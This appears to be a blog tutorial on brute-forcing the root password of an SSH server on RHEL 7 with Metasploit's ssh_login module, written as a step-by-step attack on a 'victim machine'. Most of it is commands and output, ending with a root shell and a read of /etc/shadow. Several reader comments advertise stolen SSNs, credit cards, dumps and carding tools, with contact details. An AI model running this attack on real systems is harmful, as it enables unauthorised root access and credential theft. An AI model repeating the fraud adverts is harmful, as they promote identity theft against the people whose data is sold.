In this tutorial, we will hack the password for 'root' user on SSH Server running in RHEL 7 using Metasploit running in Kali Linux.
SSH Server Name: meru.mycompany.com
SSH Server IP Address: 192.168.122.1
Perform the following steps on the Kali Linux Machine
1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
2) Start metasploit console.
root@kali:~# msfconsole
msf >
3) Check database status
msf > db_status
[*] postgresql connected to msf3
4) Perform nmap scan through a database extension in Metasploit. This scan will automatically add all the details that are found to various sections of Metasploit.
msf > db_nmap -sS 192.168.122.1 -p 22
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
5) Search for module.
msf > search ssh
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
6) Select the module.
msf > use auxiliary/scanner/ssh/ssh_login
7) View options.
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
8) Set options.
msf auxiliary(ssh_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
9) Execute the module
msf auxiliary(ssh_login) > run
[*] 192.168.122.1:22 SSH - Starting bruteforce
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'
[-] 192.168.122.1:22 SSH - Failed: 'root:password'
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'
[+] 192.168.122.1:22 SSH - Success: 'root:adminpasswd' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf auxiliary(ssh_login) > cat /etc/shadow
As seen above, we have got a root shell on the victim machine.
how to hack ssh root
ReplyDeletehttp://bicombusiness.blogspot.com/2016/01/sshpro13-final.html
Bilal Khan is a thief don't listen to the mother fucker
ReplyDeleteThis still works???
ReplyDeleteThzone
it work thanks
ReplyDeleteHi,
ReplyDeleteNice technique. Thanks for sharing.
Watch now: How To Hack Linux Red Hat Password
Cat/etc/shadow command not working..
ReplyDeleteHey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information.
**DETAILS IN LEADS**
First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term Business
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
FULLZ AVAILABLE
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Sql injector
Bitcoin cracker
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com